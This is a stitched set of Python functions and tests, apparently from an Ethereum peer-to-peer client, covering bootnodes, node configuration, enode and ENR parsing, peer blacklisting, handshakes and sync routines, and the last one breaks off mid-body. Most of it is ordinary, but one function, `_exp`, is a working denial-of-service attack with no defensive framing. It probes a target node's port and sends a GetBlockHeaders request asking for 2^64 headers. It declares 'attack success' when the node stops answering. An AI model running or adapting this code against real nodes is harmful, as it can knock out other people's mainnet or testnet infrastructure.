def get_nodes_to_connect(self) -> Generator[Node, None, None]:
    """Yield the hard-coded bootstrap nodes for the configured network.

    Raises a ValueError (on first iteration) when ``self.network_id`` matches
    neither mainnet nor ropsten.
    """
    from evm.chains.ropsten import RopstenChain
    from evm.chains.mainnet import MainnetChain

    # (public-key hex, ip) pairs; every bootnode listens on 30303 udp/tcp.
    mainnet_bootnodes = (
        ("1118980bf48b0a3640bdba04e0fe78b1add18e1cd99bf22d53daac1fd9972ad650df52176e7c7d89d1114cfef2bc23a2959aa54998a46afcf7d91809f0855082", "52.74.57.123"),  # noqa: E501
        ("78de8a0916848093c73790ead81d1928bec737d565119932b98c6b100d944b7a95e94f847f689fc723399d2e31129d182f7ef3863f2b4c820abbf3ab2722344d", "191.235.84.50"),  # noqa: E501
        ("ddd81193df80128880232fc1deb45f72746019839589eeb642d3d44efbb8b2dda2c1a46a348349964a6066f8afb016eb2a8c0f3c66f32fadf4370a236a4b5286", "52.231.202.145"),  # noqa: E501
        ("3f1d12044546b76342d59d4a05532c14b85aa669704bfe1f864fe079415aa2c02d743e03218e57a33fb94523adb54032871a6c51b2cc5514cb7c7e35b3ed0a99", "13.93.211.84"),  # noqa: E501
    )
    ropsten_bootnodes = (
        ("88c2b24429a6f7683fbfd06874ae3f1e7c8b4a5ffb846e77c705ba02e2543789d66fc032b6606a8d8888eb6239a2abe5897ce83f78dcdcfcb027d6ea69aa6fe9", "163.172.157.61"),  # noqa: E501
        ("a1ef9ba5550d5fac27f7cbd4e8d20a643ad75596f307c91cd6e7f85b548b8a6bf215cca436d6ee436d6135f9fe51398f8dd4c0bd6c6a0c332ccb41880f33ec12", "51.15.218.125"),  # noqa: E501
        ("e80276aabb7682a4a659f4341c1199de79d91a2e500a6ee9bed16ed4ce927ba8d32ba5dea357739ffdf2c5bcc848d3064bb6f149f0b4249c1f7e53f8bf02bfc8", "51.15.39.57"),  # noqa: E501
        ("584c0db89b00719e9e7b1b5c32a4a8942f379f4d5d66bb69f9c7fa97fa42f64974e7b057b35eb5a63fd7973af063f9a1d32d8c60dbb4854c64cb8ab385470258", "51.15.35.2"),  # noqa: E501
        ("d40871fc3e11b2649700978e06acd68a24af54e603d4333faecb70926ca7df93baa0b7bf4e927fcad9a7c1c07f9b325b22f6d1730e728314d0e4e6523e5cebc2", "51.15.132.235"),  # noqa: E501
        ("482484b9198530ee2e00db89791823244ca41dcd372242e2e1297dd06f6d8dd357603960c5ad9cc8dc15fcdf0e4edd06b7ad7db590e67a0b54f798c26581ebd7", "51.15.75.138"),  # noqa: E501
    )

    if self.network_id == MainnetChain.network_id:
        bootnodes = mainnet_bootnodes
    elif self.network_id == RopstenChain.network_id:
        bootnodes = ropsten_bootnodes
    else:
        raise ValueError("Unknown network_id: {}".format(self.network_id))

    for pubkey_hex, ip in bootnodes:
        yield Node(keys.PublicKey(decode_hex(pubkey_hex)), Address(ip, 30303, 30303))
def _exp(node_url, chain) -> None:
    """Probe ``node_url`` and send it an unanswerably large GetBlockHeaders request.

    Args:
        node_url: enode URI of the target (``enode://pubkey@ip:port``).
        chain: either ``'mainnet'`` or ``'testnet'``.

    Raises:
        ValueError: for any other ``chain`` value.
    """
    from evm.chains.ropsten import RopstenChain, ROPSTEN_GENESIS_HEADER, ROPSTEN_VM_CONFIGURATION
    from evm.db.backends.memory import MemoryDB
    from tests.p2p.integration_test_helpers import FakeAsyncHeaderDB, connect_to_peers_loop

    ip, port = node_url.split('@')[1].split(':')
    if port_probe(ip, port):
        print('The port is open, starting to attack...')

    peer_class = LESPeer
    if chain == 'mainnet':
        block_hash = '0xd4e56740f876aef8c010b86a40d5f56745a118d0906a34e69aec8c0db1cb8fa3'
        headerdb = FakeAsyncHeaderDB(MemoryDB())
        headerdb.persist_header(MAINNET_GENESIS_HEADER)
        network_id = MainnetChain.network_id
        vm_configuration = MAINNET_VM_CONFIGURATION
    elif chain == 'testnet':
        block_hash = '0x41941023680923e0fe4d74a34bdac8141f2540e3ae90623718e47d66d1ca4a2d'
        headerdb = FakeAsyncHeaderDB(MemoryDB())
        headerdb.persist_header(ROPSTEN_GENESIS_HEADER)
        network_id = RopstenChain.network_id
        vm_configuration = ROPSTEN_VM_CONFIGURATION
    else:
        # BUG FIX: an unknown chain previously left peer_pool/block_hash/network_id
        # unbound and crashed later with UnboundLocalError; fail fast instead.
        raise ValueError("Unknown chain: {}".format(chain))

    nodes = [Node.from_uri(node_url)]
    peer_pool = PeerPool(
        peer_class, headerdb, network_id, ecies.generate_privkey(), vm_configuration)
    loop = asyncio.get_event_loop()

    async def attack() -> None:
        # The closures only read peer_pool/block_hash, so no `nonlocal` is needed.
        while not peer_pool.peers:
            print("Waiting for peer connection...")
            await asyncio.sleep(1)
        peer = cast(LESPeer, peer_pool.peers[0])
        cmd = GetBlockHeaders(peer.sub_proto.cmd_id_offset)
        data = {
            'request_id': 1,
            # Ask for an absurd number of headers starting at block_hash.
            'query': GetBlockHeadersQuery(decode_hex(block_hash), 1, 0xffffffffffffffff, False),
        }
        header, body = cmd.encode(data)
        peer.sub_proto.send(header, body)
        await asyncio.sleep(1)
        # If the remote stopped answering, assume it crashed.
        if not port_probe(ip, port):
            print('The port is closed,attack success ...')
            exit()

    t1 = asyncio.ensure_future(connect_to_peers_loop(peer_pool, nodes))
    t2 = asyncio.ensure_future(attack())
    loop.set_debug(True)
    loop.run_until_complete(asyncio.wait([t1, t2]))
    loop.close()
def __init__(self,
             network_id: int,
             max_peers: int = DEFAULT_MAX_PEERS,
             data_dir: str = None,
             nodekey_path: str = None,
             logfile_path: str = None,
             nodekey: PrivateKey = None,
             sync_mode: str = SYNC_FULL,
             port: int = 30303,
             preferred_nodes: Tuple[KademliaNode, ...] = None,
             bootstrap_nodes: Tuple[KademliaNode, ...] = None) -> None:
    """Node configuration.

    Defaults ``preferred_nodes``/``bootstrap_nodes`` from the built-in tables
    for known networks, and derives ``data_dir``/``logfile_path`` when not
    given explicitly.

    Raises:
        ValueError: if both ``nodekey`` and ``nodekey_path`` are provided.
    """
    self.network_id = network_id
    self.max_peers = max_peers
    self.sync_mode = sync_mode
    self.port = port

    if not preferred_nodes and network_id in DEFAULT_PREFERRED_NODES:
        self.preferred_nodes = DEFAULT_PREFERRED_NODES[self.network_id]
    else:
        self.preferred_nodes = preferred_nodes

    if bootstrap_nodes is None:
        if self.network_id == MAINNET_NETWORK_ID:
            self.bootstrap_nodes = tuple(
                KademliaNode.from_uri(enode) for enode in MAINNET_BOOTNODES)
        elif self.network_id == ROPSTEN_NETWORK_ID:
            self.bootstrap_nodes = tuple(
                KademliaNode.from_uri(enode) for enode in ROPSTEN_BOOTNODES)
        else:
            # BUG FIX: previously no attribute was set for unknown networks,
            # causing an AttributeError on first access of bootstrap_nodes.
            # Default to no bootnodes, matching TrinityConfig's behavior for
            # non-preconfigured networks.
            self.bootstrap_nodes = tuple()
    else:
        self.bootstrap_nodes = bootstrap_nodes

    # validation
    if nodekey is not None and nodekey_path is not None:
        raise ValueError(
            "It is invalid to provide both a `nodekey` and a `nodekey_path`"
        )

    # set values
    if data_dir is not None:
        self.data_dir = data_dir
    else:
        self.data_dir = get_data_dir_for_network_id(self.network_id)

    if nodekey_path is not None:
        self.nodekey_path = nodekey_path
    elif nodekey is not None:
        self.nodekey = nodekey
    # NOTE(review): when neither nodekey nor nodekey_path is given, neither
    # attribute is set here -- presumably generated/derived elsewhere; confirm.

    if logfile_path is not None:
        self.logfile_path = logfile_path
    else:
        self.logfile_path = get_logfile_path(self.data_dir)
def from_parser_args(cls, args: argparse.Namespace, trinity_config: TrinityConfig) -> 'BaseAppConfig':
    """Build the app config, copying the CLI's bootstrap/preferred enode lists
    onto ``trinity_config``."""
    if args is not None:
        # This is quick and dirty way to get bootstrap_nodes
        if args.bootstrap_nodes is not None:
            bootstrap = tuple(
                KademliaNode.from_uri(enode)
                for enode in args.bootstrap_nodes.split(','))
        else:
            bootstrap = tuple()
        if args.preferred_nodes is not None:
            preferred = tuple(
                KademliaNode.from_uri(enode)
                for enode in args.preferred_nodes.split(','))
        else:
            preferred = tuple()
        trinity_config.bootstrap_nodes = bootstrap
        trinity_config.preferred_nodes = preferred
    return cls(trinity_config)
def _get_peer_candidates(self,
                         num_requested: int,
                         connected_remotes: Set[Node]) -> Iterable[Node]:
    """
    Return up to `num_requested` candidates sourced from peers we have
    historically connected to which match the following criteria:

    * Matches all of: network_id, protocol, genesis_hash, protocol_version
    * Either has no blacklist record or existing blacklist record is expired.
    * Not in the set of remotes we are already connected to.

    NOTE(review): `num_requested` is not applied anywhere in this body -- the
    full candidate set is yielded lazily, so presumably the caller slices the
    iterator. Confirm before relying on an upper bound here.
    """
    connected_uris = set(remote.uri() for remote in connected_remotes)
    now = datetime.datetime.utcnow()
    metadata_filters = self._get_candidate_filter_query()
    # Query the database for peers that match our criteria.
    candidates = self.session.query(Remote).outerjoin(  # type: ignore
        # Join against the blacklist records with matching node URI
        Remote.blacklist,
    ).filter(
        # Either they have no blacklist record or the record is expired.
        # (`== None` is required by SQLAlchemy; `is None` would not translate to SQL.)
        ((Remote.blacklist == None) | (BlacklistRecord.expires_at <= now)),  # noqa: E711
        # We are not currently connected to them
        ~Remote.uri.in_(connected_uris),  # type: ignore
        # They match our filters for network metadata
        *metadata_filters,
    ).order_by(
        # We want the ones that we have recently connected to successfully to be first.
        Remote.last_connected_at.desc(),  # type: ignore
    )
    # Return them as an iterator to allow the consuming process to
    # determine how many records it wants to fetch.
    for candidate in candidates:
        yield Node.from_uri(candidate.uri)
async def test_get_local_enr(manually_driven_discovery):
    discovery = manually_driven_discovery
    first_enr = await discovery.get_local_enr()
    validate_node_enr(discovery.this_node, first_enr, sequence_number=1)

    snapshot = copy.copy(discovery.this_node)
    # Changing our node's details while no refresh is due keeps serving the
    # stale ENR for the previous details.
    discovery.this_node.address.udp_port += 1
    assert discovery._local_enr_next_refresh > time.monotonic()
    stale_enr = await discovery.get_local_enr()
    validate_node_enr(snapshot, stale_enr, sequence_number=1)

    # Once a refresh is due, a fresh ENR with a bumped sequence number is built...
    discovery._local_enr_next_refresh = time.monotonic() - 1
    fresh_enr = await discovery.get_local_enr()
    validate_node_enr(discovery.this_node, fresh_enr, sequence_number=2)

    # ...persisted into our DB...
    stored = Node(discovery.enr_db.get_enr(discovery.this_node.id))
    assert fresh_enr == stored.enr

    # ...and the next refresh deadline pushed into the future.
    assert discovery._local_enr_next_refresh > time.monotonic()
async def addPeer(self, uri: str) -> None:
    """Ask the networking process to connect to the node at ``uri``."""
    validate_enode_uri(uri, require_ip=True)
    node = Node.from_uri(uri)
    await self.event_bus.broadcast(
        ConnectToNodeCommand(node),
        TO_NETWORKING_BROADCAST_CONFIG,
    )
async def test_bootstrap_nodes():
    shared_privkey = PrivateKeyFactory().to_bytes()
    first = ENRFactory(private_key=shared_privkey)
    second = ENRFactory()
    discovery = MockDiscoveryService([Node(first), Node(second)])

    # Both bootnode ENRs are seeded into the DB on construction.
    assert discovery.enr_db.get_enr(first.node_id) == first
    assert discovery.enr_db.get_enr(second.node_id) == second
    assert [n.enr for n in discovery.bootstrap_nodes] == [first, second]

    # If our DB gets updated with a newer ENR of one of our bootnodes, the
    # bootstrap_nodes property reflects the newer record.
    newer_first = ENRFactory(
        private_key=shared_privkey, sequence_number=first.sequence_number + 1)
    discovery.enr_db.set_enr(newer_first)
    assert [n.enr for n in discovery.bootstrap_nodes] == [newer_first, second]
def from_parser_args(cls, args: argparse.Namespace, trinity_config: TrinityConfig) -> 'BaseAppConfig':
    """
    Initialize from the namespace object produced by an ``argparse.ArgumentParser``
    and the :class:`~trinity.config.TrinityConfig`
    """
    if args is not None:
        # This is quick and dirty way to get bootstrap_nodes
        def _parse(raw):
            if raw is None:
                return tuple()
            return tuple(KademliaNode.from_uri(enode) for enode in raw.split(','))

        trinity_config.bootstrap_nodes = _parse(args.bootstrap_nodes)
        trinity_config.preferred_nodes = _parse(args.preferred_nodes)
    return cls(trinity_config)
def __init__(self,
             network_id: int,
             app_identifier: str = "",
             genesis_config: Dict[str, Any] = None,
             max_peers: int = 25,
             trinity_root_dir: Path = None,
             trinity_tmp_root_dir: bool = False,
             data_dir: Path = None,
             nodekey_path: Path = None,
             nodekey: PrivateKey = None,
             port: int = 30303,
             preferred_nodes: Tuple[KademliaNode, ...] = None,
             bootstrap_nodes: Tuple[KademliaNode, ...] = None) -> None:
    """Initialize the Trinity node configuration.

    The genesis config must either be given explicitly or be derivable from a
    preconfigured ``network_id``; preferred/bootstrap nodes default from the
    built-in tables for known networks.

    Raises:
        TypeError: if no ``genesis_config`` is given and ``network_id`` is not
            one of the preconfigured networks.
        ValueError: if both ``nodekey`` and ``nodekey_path`` are provided.
    """
    self.app_identifier = app_identifier
    self.network_id = network_id
    self.max_peers = max_peers
    self.port = port
    self._app_configs = {}

    if genesis_config is not None:
        self.genesis_config = genesis_config
    elif network_id in PRECONFIGURED_NETWORKS:
        self.genesis_config = _load_preconfigured_genesis_config(network_id)
    else:
        raise TypeError(
            "No `genesis_config` was provided and the `network_id` is not "
            "in the known preconfigured networks. Cannot initialize "
            "ChainConfig")

    if trinity_root_dir is not None:
        self.trinity_root_dir = trinity_root_dir
    self.trinity_tmp_root_dir = trinity_tmp_root_dir

    # Explicit preferred_nodes win; otherwise fall back to the defaults for
    # known networks (an empty/None argument triggers the fallback).
    if not preferred_nodes and self.network_id in DEFAULT_PREFERRED_NODES:
        self.preferred_nodes = DEFAULT_PREFERRED_NODES[self.network_id]
    else:
        self.preferred_nodes = preferred_nodes

    if bootstrap_nodes is None:
        if self.network_id in PRECONFIGURED_NETWORKS:
            bootnodes = PRECONFIGURED_NETWORKS[self.network_id].bootnodes
            self.bootstrap_nodes = tuple(
                KademliaNode.from_uri(enode) for enode in bootnodes)
        else:
            # Unknown networks simply get no bootnodes.
            self.bootstrap_nodes = tuple()
    else:
        self.bootstrap_nodes = bootstrap_nodes

    if data_dir is not None:
        self.data_dir = data_dir

    # nodekey and nodekey_path are mutually exclusive; when neither is given,
    # neither attribute is set here -- presumably derived elsewhere; confirm.
    if nodekey is not None and nodekey_path is not None:
        raise ValueError(
            "It is invalid to provide both a `nodekey` and a `nodekey_path`"
        )
    elif nodekey_path is not None:
        self.nodekey_path = nodekey_path
    elif nodekey is not None:
        self.nodekey = nodekey
def _test() -> None:
    """Ad-hoc integration entry point: connect to Ropsten peers and run the
    StateDownloader against a local LevelDB until it finishes or SIGINT/SIGTERM.
    """
    import argparse
    import signal
    from eth.chains.ropsten import RopstenChain, ROPSTEN_VM_CONFIGURATION
    from p2p import ecies
    from p2p.kademlia import Node
    from p2p.peer import DEFAULT_PREFERRED_NODES
    from tests.trinity.core.integration_test_helpers import (
        FakeAsyncChainDB, FakeAsyncLevelDB, connect_to_peers_loop)

    logging.basicConfig(level=logging.INFO, format='%(asctime)s %(levelname)s: %(message)s')

    parser = argparse.ArgumentParser()
    parser.add_argument('-db', type=str, required=True)
    parser.add_argument('-debug', action="store_true")
    parser.add_argument('-enode', type=str, required=False,
                        help="The enode we should connect to")
    args = parser.parse_args()

    log_level = logging.INFO
    if args.debug:
        log_level = logging.DEBUG

    db = FakeAsyncLevelDB(args.db)
    chaindb = FakeAsyncChainDB(db)
    network_id = RopstenChain.network_id
    # Use an explicitly-given enode when provided, else the built-in preferred nodes.
    if args.enode:
        nodes = tuple([Node.from_uri(args.enode)])
    else:
        nodes = DEFAULT_PREFERRED_NODES[network_id]
    peer_pool = PeerPool(
        ETHPeer, chaindb, network_id, ecies.generate_privkey(), ROPSTEN_VM_CONFIGURATION)
    asyncio.ensure_future(peer_pool.run())
    peer_pool.run_task(connect_to_peers_loop(peer_pool, nodes))

    head = chaindb.get_canonical_head()
    downloader = StateDownloader(chaindb, db, head.state_root, peer_pool)
    downloader.logger.setLevel(log_level)
    loop = asyncio.get_event_loop()

    sigint_received = asyncio.Event()
    for sig in [signal.SIGINT, signal.SIGTERM]:
        loop.add_signal_handler(sig, sigint_received.set)

    async def exit_on_sigint() -> None:
        # Tear down the pool and downloader, then stop the event loop.
        await sigint_received.wait()
        await peer_pool.cancel()
        await downloader.cancel()
        loop.stop()

    async def run() -> None:
        # When the download completes on its own, trigger the same teardown path.
        await downloader.run()
        downloader.logger.info("run() finished, exiting")
        sigint_received.set()

    # loop.set_debug(True)
    asyncio.ensure_future(exit_on_sigint())
    asyncio.ensure_future(run())
    loop.run_forever()
    loop.close()
def _test() -> None:
    """Ad-hoc integration entry point: full-sync the Ropsten chain from live
    peers into a local LevelDB until SIGINT/SIGTERM."""
    import argparse
    import asyncio
    import signal
    from eth.chains.ropsten import RopstenChain, ROPSTEN_VM_CONFIGURATION
    from eth.db.backends.level import LevelDB
    from p2p import ecies
    from p2p.kademlia import Node
    from trinity.protocol.common.constants import DEFAULT_PREFERRED_NODES
    from trinity.protocol.common.context import ChainContext
    from tests.trinity.core.integration_test_helpers import (
        FakeAsyncChainDB, FakeAsyncRopstenChain, connect_to_peers_loop)

    logging.basicConfig(level=logging.INFO, format='%(asctime)s %(levelname)s: %(message)s')

    parser = argparse.ArgumentParser()
    parser.add_argument('-db', type=str, required=True)
    parser.add_argument('-enode', type=str, required=False,
                        help="The enode we should connect to")
    args = parser.parse_args()

    chaindb = FakeAsyncChainDB(LevelDB(args.db))
    chain = FakeAsyncRopstenChain(chaindb)
    network_id = RopstenChain.network_id
    privkey = ecies.generate_privkey()

    context = ChainContext(headerdb=chaindb,
                           network_id=network_id,
                           vm_configuration=ROPSTEN_VM_CONFIGURATION)
    peer_pool = ETHPeerPool(privkey=privkey, context=context)
    # Use an explicitly-given enode when provided, else the built-in preferred nodes.
    if args.enode:
        nodes = tuple([Node.from_uri(args.enode)])
    else:
        nodes = DEFAULT_PREFERRED_NODES[network_id]

    asyncio.ensure_future(peer_pool.run())
    peer_pool.run_task(connect_to_peers_loop(peer_pool, nodes))
    loop = asyncio.get_event_loop()

    syncer = FullNodeSyncer(chain, chaindb, chaindb.db, peer_pool)

    sigint_received = asyncio.Event()
    for sig in [signal.SIGINT, signal.SIGTERM]:
        loop.add_signal_handler(sig, sigint_received.set)

    async def exit_on_sigint() -> None:
        # Cancel the syncer and pool, then stop the event loop.
        await sigint_received.wait()
        await syncer.cancel()
        await peer_pool.cancel()
        loop.stop()

    loop.set_debug(True)
    asyncio.ensure_future(exit_on_sigint())
    asyncio.ensure_future(syncer.run())
    loop.run_forever()
    loop.close()
def test_node_from_enode_uri():
    """A node parsed from an enode URI round-trips its pubkey, ip and port."""
    hex_pubkey = 'a979fb575495b8d6db44f750317d0f4622bf4c2aa3365d6af7c284339968eef29b69ad0dce72a4d8db5ebb4968de0e3bec910127f134779fbcb0cb6d3331163c'  # noqa: E501
    host = '52.16.188.185'
    listen_port = 30303
    enode = 'enode://%s@%s:%d' % (hex_pubkey, host, listen_port)

    parsed = Node.from_uri(enode)

    assert parsed.address.ip == host
    assert parsed.address.udp_port == parsed.address.tcp_port == listen_port
    assert parsed.pubkey.to_hex() == '0x' + hex_pubkey
async def test_shard_syncer(n_peers, connections):
    """Spin up ``n_peers`` ShardingServers, wire them per ``connections``
    (pairs of indices), and check that a collation proposed by any node
    propagates to every other node."""
    cancel_token = CancelToken("canceltoken")
    PeerTuple = collections.namedtuple("PeerTuple", ["node", "server", "syncer"])
    peer_tuples = []
    for i in range(n_peers):
        # Deterministic keys (1..n) keep the test reproducible.
        private_key = keys.PrivateKey(pad32(int_to_big_endian(i + 1)))
        port = get_open_port()
        address = Address("127.0.0.1", port, port)
        node = Node(private_key.public_key, address)
        server = ShardingServer(private_key,
                                address,
                                network_id=9324090483,
                                min_peers=0,
                                peer_class=ShardingPeer)
        asyncio.ensure_future(server.run())
        peer_tuples.append(
            PeerTuple(
                node=node,
                server=server,
                syncer=server.syncer,
            ))

    # connect peers to each other
    await asyncio.gather(*[
        peer_tuples[i].server.peer_pool._connect_to_nodes([peer_tuples[j].node])
        for i, j in connections
    ])
    for i, j in connections:
        peer_remotes = [peer.remote for peer in peer_tuples[i].server.peer_pool.peers]
        assert peer_tuples[j].node in peer_remotes

    # let each node propose and check that collation appears at all other nodes
    for proposer in peer_tuples:
        collation = proposer.syncer.propose()
        await asyncio.wait_for(asyncio.gather(*[
            peer_tuple.syncer.collations_received_event.wait()
            for peer_tuple in peer_tuples
            if peer_tuple != proposer
        ]), timeout=10)
        for peer_tuple in peer_tuples:
            assert peer_tuple.syncer.shard.get_collation_by_hash(collation.hash) == collation

    # stop everything
    cancel_token.trigger()
    await asyncio.gather(
        *[peer_tuple.server.cancel() for peer_tuple in peer_tuples])
    await asyncio.gather(
        *[peer_tuple.syncer.cancel() for peer_tuple in peer_tuples])
def test_node_from_enr_uri():
    """Parsing an ENR's textual repr yields a node with the right id/address."""
    private_key = PrivateKeyFactory()
    addr = AddressFactory()
    record = ENRFactory(private_key=private_key.to_bytes(), address=addr)

    parsed = Node.from_uri(repr(record))

    assert parsed.id == keccak(private_key.public_key.to_bytes())
    assert parsed.address == addr
def test_node_constructor():
    """A node built from an ENR exposes the keccak-derived id and the address."""
    private_key = PrivateKeyFactory()
    addr = AddressFactory()
    record = ENRFactory(private_key=private_key.to_bytes(), address=addr)

    built = Node(record)

    assert built.id == keccak(private_key.public_key.to_bytes())
    assert built.address == addr
def _fetch_bad_node(self, remote: Node) -> Optional[BadNode]:
    """Look up the blacklist row for ``remote``; return None when absent."""
    enode = remote.uri()
    cursor = self.db.execute('SELECT * from bad_nodes WHERE enode = ?', (enode,))
    row = cursor.fetchone()
    if not row:
        return None
    return BadNode(row['enode'], row['until'], row['reason'], row['error_count'])
def enodeToMultiAddress(_node):
    """Translate an enode URI into a libp2p multiaddress."""
    parsed = urllib.parse.urlparse(_node)
    pub = keys.PublicKey(bytearray.fromhex(parsed.username))
    knode = Node.from_pubkey_and_addr(
        pub, Address(parsed.hostname, parsed.port, parsed.port))
    peer_id = base58.b58encode(knode.id).decode("utf-8")
    return multiaddr.Multiaddr(
        "/ip4/" + parsed.hostname + "/tcp/" + str(parsed.port) + "/p2p/" + peer_id)
def __call__(self, parser, namespace, values, option_string=None):
    # argparse action: parse the enode URI and accumulate it on namespace.<dest>.
    if values is None:
        return
    node = Node.from_uri(values)
    current = getattr(namespace, self.dest)
    if current is None:
        current = []
        setattr(namespace, self.dest, current)
    current.append(node)
async def receive_handshake(self,
                            reader: asyncio.StreamReader,
                            writer: asyncio.StreamWriter) -> None:
    """Perform the responder side of the encryption handshake on an incoming
    connection, then build an ETHPeer from the derived secrets and register it
    with the peer pool."""
    # Use reader to read the auth_init msg until EOF
    msg = await reader.read(ENCRYPTED_AUTH_MSG_LEN)
    # Use HandshakeResponder.decode_authentication(auth_init_message) on auth init msg
    try:
        ephem_pubkey, initiator_nonce, initiator_pubkey = decode_authentication(
            msg, self.privkey)
    # Try to decode as EIP8
    except DecryptionError:
        # EIP-8 messages carry their total size in the first two bytes; read
        # the outstanding remainder and retry the decode.
        msg_size = big_endian_to_int(msg[:2])
        remaining_bytes = msg_size - ENCRYPTED_AUTH_MSG_LEN + 2
        msg += await reader.read(remaining_bytes)
        ephem_pubkey, initiator_nonce, initiator_pubkey = decode_authentication(
            msg, self.privkey)

    # Get remote's address: IPv4 or IPv6
    ip, port, *_ = writer.get_extra_info("peername")
    remote_address = Address(ip, port)

    # Create `HandshakeResponder(remote: kademlia.Node, privkey: datatypes.PrivateKey)` instance
    initiator_remote = Node(initiator_pubkey, remote_address)
    responder = HandshakeResponder(initiator_remote, self.privkey)

    # Call `HandshakeResponder.create_auth_ack_message(nonce: bytes)` to create the reply
    responder_nonce = secrets.token_bytes(HASH_LEN)
    auth_ack_msg = responder.create_auth_ack_message(nonce=responder_nonce)
    auth_ack_ciphertext = responder.encrypt_auth_ack_message(auth_ack_msg)

    # Use the `writer` to send the reply to the remote
    writer.write(auth_ack_ciphertext)
    await writer.drain()

    # Call `HandshakeResponder.derive_shared_secrets()` and use return values to create `Peer`
    aes_secret, mac_secret, egress_mac, ingress_mac = responder.derive_secrets(
        initiator_nonce=initiator_nonce,
        responder_nonce=responder_nonce,
        remote_ephemeral_pubkey=ephem_pubkey,
        auth_init_ciphertext=msg,
        auth_ack_ciphertext=auth_ack_ciphertext)

    # Create and register peer in peer_pool
    eth_peer = ETHPeer(remote=initiator_remote,
                       privkey=self.privkey,
                       reader=reader,
                       writer=writer,
                       aes_secret=aes_secret,
                       mac_secret=mac_secret,
                       egress_mac=egress_mac,
                       ingress_mac=ingress_mac,
                       chaindb=self.chaindb,
                       network_id=self.network_id)
    self.peer_pool.add_peer(eth_peer)
def _extract_nodes_from_payload(
        sender: AddressAPI,
        payload: List[Tuple[str, bytes, bytes, bytes]],
        logger: ExtendedDebugLogger) -> Iterator[NodeAPI]:
    """Yield a Node for every (ip, udp_port, tcp_port, node_id) entry whose
    relayed address passes validation; log and skip the rest."""
    for ip, udp_port, tcp_port, node_id in payload:
        address = Address.from_endpoint(ip, udp_port, tcp_port)
        if not check_relayed_addr(sender, address):
            logger.debug("Skipping invalid address %s relayed by %s", address, sender)
            continue
        yield Node(keys.PublicKey(node_id), address)
def enrToMultiAddress(_enr):
    """Decode an ENR textual repr into enode/ENR/multiaddr views of the node."""
    node = KNode.from_enr_repr(_enr)
    uri = node.uri()
    return {
        "enode": uri,
        "enrdata": {
            "address": node.address,
            "pubkey": node.pubkey,
            "id": node.id,
        },
        "enritems": ENR.from_repr(_enr).items(),
        "multiaddr": Handler.enodeToMultiAddress(uri),
    }
def _make_node_with_enr_and_forkid(genesis_hash, head, vm_config):
    """Build a Node whose ENR advertises an `eth` forkid entry plus a random
    IPv4 address on port 30304."""
    fork_blocks = forkid.extract_fork_blocks(vm_config)
    node_forkid = forkid.make_forkid(genesis_hash, head, fork_blocks)
    packed_ip = socket.inet_aton(IPAddressFactory.generate())
    port = 30304  # advertised for both udp and tcp
    record = ENRFactory(
        custom_kv_pairs={
            b'eth': sedes.List([forkid.ForkID]).serialize([node_forkid]),
            IP_V4_ADDRESS_ENR_KEY: packed_ip,
            UDP_PORT_ENR_KEY: port,
            TCP_PORT_ENR_KEY: port,
        })
    return Node(record)
def _test():
    """Ad-hoc integration entry point: full-sync the Ropsten chain from live
    peers into a local LevelDB until SIGINT/SIGTERM."""
    import argparse
    import asyncio
    from concurrent.futures import ProcessPoolExecutor
    import signal
    from p2p import ecies
    from p2p.kademlia import Node
    from p2p.peer import ETHPeer, DEFAULT_PREFERRED_NODES
    from evm.chains.ropsten import RopstenChain, ROPSTEN_VM_CONFIGURATION
    from evm.db.backends.level import LevelDB
    from tests.p2p.integration_test_helpers import (
        FakeAsyncChainDB, FakeAsyncRopstenChain, connect_to_peers_loop)
    logging.basicConfig(level=logging.INFO, format='%(asctime)s %(levelname)s: %(message)s')

    parser = argparse.ArgumentParser()
    parser.add_argument('-db', type=str, required=True)
    parser.add_argument('-enode', type=str, required=False,
                        help="The enode we should connect to")
    args = parser.parse_args()

    chaindb = FakeAsyncChainDB(LevelDB(args.db))
    chain = FakeAsyncRopstenChain(chaindb)
    network_id = RopstenChain.network_id
    privkey = ecies.generate_privkey()
    peer_pool = PeerPool(ETHPeer, chaindb, network_id, privkey, ROPSTEN_VM_CONFIGURATION)
    # Use an explicitly-given enode when provided, else the built-in preferred nodes.
    if args.enode:
        nodes = tuple([Node.from_uri(args.enode)])
    else:
        nodes = DEFAULT_PREFERRED_NODES[network_id]

    asyncio.ensure_future(peer_pool.run())
    asyncio.ensure_future(connect_to_peers_loop(peer_pool, nodes))
    loop = asyncio.get_event_loop()
    # Offload blocking work submitted via run_in_executor to worker processes.
    loop.set_default_executor(ProcessPoolExecutor())

    syncer = FullNodeSyncer(chain, chaindb, chaindb.db, peer_pool)

    sigint_received = asyncio.Event()
    for sig in [signal.SIGINT, signal.SIGTERM]:
        loop.add_signal_handler(sig, sigint_received.set)

    async def exit_on_sigint():
        # Cancel the syncer and pool, then stop the event loop.
        await sigint_received.wait()
        await syncer.cancel()
        await peer_pool.cancel()
        loop.stop()

    loop.set_debug(True)
    asyncio.ensure_future(exit_on_sigint())
    asyncio.ensure_future(syncer.run())
    loop.run_forever()
    loop.close()
def record_blacklist(self, remote: Node, timeout_seconds: int, reason: str) -> None:
    """Blacklist ``remote`` for ``timeout_seconds``, scaling the timeout for
    repeat offenders."""
    try:
        existing = self._get_record(remote.uri())
    except NoResultFound:
        # First offence: plain timeout starting now.
        self._create_record(
            remote,
            datetime.datetime.utcnow() + datetime.timedelta(seconds=timeout_seconds),
            reason,
        )
    else:
        # Repeat offence: scale the timeout by the updated error count.
        self._update_record(
            remote,
            adjust_repeat_offender_timeout(timeout_seconds, existing.error_count + 1),
            reason,
        )
async def test_lookup_and_maybe_update_enr_new_node():
    discovery = MockDiscoveryService([])
    private_key = PrivateKeyFactory()
    addr = AddressFactory()

    # An unknown pubkey/address pair causes a stub ENR to be created...
    stub_enr = discovery.lookup_and_maybe_update_enr(private_key.public_key, addr)
    assert stub_enr.sequence_number == 0
    stub_node = Node(stub_enr)
    assert stub_node.pubkey == private_key.public_key
    assert stub_node.address == addr

    # ...and persisted into our DB.
    assert discovery.enr_db.get_enr(stub_node.id) == stub_enr
def __call__(self,
             parser: argparse.ArgumentParser,
             namespace: argparse.Namespace,
             value: Any,
             option_string: str=None) -> None:
    # argparse action: parse the enode URI and append it to namespace.<dest>.
    if value is None:
        return
    node = Node.from_uri(value)
    if getattr(namespace, self.dest) is None:
        setattr(namespace, self.dest, [])
    getattr(namespace, self.dest).append(node)
async def removePeer(self, uri: str) -> bool:
    """Disconnect the connected peer identified by ``uri``; return whether
    a matching peer was found."""
    validate_enode_uri(uri, require_ip=True)
    target = Node.from_uri(uri)
    response = await self.event_bus.request(GetConnectedPeersRequest())
